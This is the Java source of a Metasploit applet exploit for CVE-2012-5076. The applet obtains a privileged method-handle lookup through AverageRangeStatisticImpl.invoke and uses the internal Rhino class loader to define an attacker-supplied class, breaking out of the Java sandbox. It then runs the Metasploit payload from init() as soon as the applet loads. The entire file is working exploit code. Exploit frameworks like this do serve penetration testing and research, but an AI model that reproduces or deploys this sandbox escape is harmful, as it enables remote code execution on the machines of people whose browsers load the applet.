metasploit-framework/external/source/exploits/cve-2012-5076_2/Exploit.java

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
import com.sun.org.glassfish.external.statistics.impl.*;

public class Exploit extends Applet
{
	public static MethodHandles.Lookup test0;
	
    public Exploit()
    {
    }
    

    public void init()
    {
        try
        {
			
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            byte[] buffer = new byte[8192];
            int length;

            // read in the class file from the jar
            InputStream is = getClass().getResourceAsStream("B.class");
            // and write it out to the byte array stream
            while( ( length = is.read( buffer ) ) > 0 )
                bos.write( buffer, 0, length );
            // convert it to a simple byte array
            buffer = bos.toByteArray();
            
            Class c = Class.forName("java.lang.invoke.MethodHandles");
            Method m = c.getMethod("lookup", new Class[0]);
            AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
            MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);

            MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
            MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
            Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
            Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
            
            // Instance of sun.org.mozilla.javascript.internal.Context
            MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
            MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
            Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
            
            // Context.createClassLoader
            MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
            MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
            Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
            
            // GeneratedClassLoader.defineClass
            MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
            MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
            Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
            
            //New instance of the helper Class
            localClass3.newInstance();

            Payload.main(null);
            //Runtime.getRuntime().exec("calc.exe");
        }
        catch(Throwable ex)
        {
            //ex.printStackTrace();
        }
    }

}